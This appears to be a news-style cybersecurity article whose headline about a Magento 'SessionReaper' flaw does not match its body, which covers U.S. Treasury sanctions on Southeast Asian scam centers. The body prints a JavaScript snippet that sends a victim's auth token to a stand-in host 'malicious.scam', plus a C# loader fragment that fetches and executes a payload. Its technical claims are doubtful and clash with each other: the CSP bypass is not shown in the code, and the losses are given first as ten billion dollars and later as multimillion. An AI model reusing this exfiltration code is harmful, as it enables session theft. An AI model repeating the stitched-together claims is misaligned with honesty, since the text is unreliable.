Magento and Adobe SessionReaper Vulnerability Exposes Thousands of Online Stores to Automated Attacks

Cybersecurity: U.S. Treasury Sanctions on Cyber Scam Centers

The U.S. Department of the Treasury has initiated sanctions against a network of cyber scam centers in Southeast Asia, which have collectively defrauded American victims of over ten billion dollars in 2024.

Operational Details

These operations, posing as legitimate virtual currency investment platforms, utilized advanced social engineering techniques to deceive users into transferring funds. The scams extended from Myanmar to Cambodia, involving forced labor and coercive practices.

The scams, which became prevalent during the early months of the pandemic, used romance fraud, mobile messaging exploits, and fraudulent blockchain tutorials to present an illusion of credible investment returns. The sites featured real-time price feeds, SSL certificates, and user interfaces similar to legitimate exchanges.

Technical Exploits

Backend malware kits were installed on operators’ workstations, enabling automated spoofing of payment notifications and social account takeovers. The Treasury identified code modules that intercepted SMS one-time-passcodes and injected synthetic transaction confirmations, effectively bypassing two-factor authentication.

Operators, some under debt bondage, were trained to engage victims using scripts that incorporated open-source intelligence. Victims were tricked into running benign-looking JavaScript snippets, granting scammers access to their session storage. An example of this script is shown below:

(async () => {
  const token = localStorage.getItem('auth_token');
  await fetch('https://malicious.scam/api/steal', {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ token, balance: window.wallet.balance })
  });
})();

This snippet exploited browser extensions to bypass Content Security Policy (CSP) restrictions and allowed remote script injection.

Persistence Mechanisms

At the core of the Burma-based hub, known as Yatai New City, operators implemented custom mechanisms to maintain control over compromised accounts. A C# loader, termed “BeaconYatai,” was embedded in video conferencing tools to establish command-and-control channels. It registered as a Windows service, “SvcUpdate,” and polled the Telegram API for encrypted tasks, decrypted with a hardcoded RSA key:

RSAParameters rsaKey = LoadKey("-----BEGIN RSA PRIVATE KEY-----...");
byte[] payload = FetchFromTelegram().Decrypt(rsaKey);
ExecutePayload(payload);

These operations, utilizing social coercion, scripting exploits, and malware persistence, achieved high operational uptime. The Treasury’s sanctions are a significant measure toward dismantling this multimillion-dollar criminal network.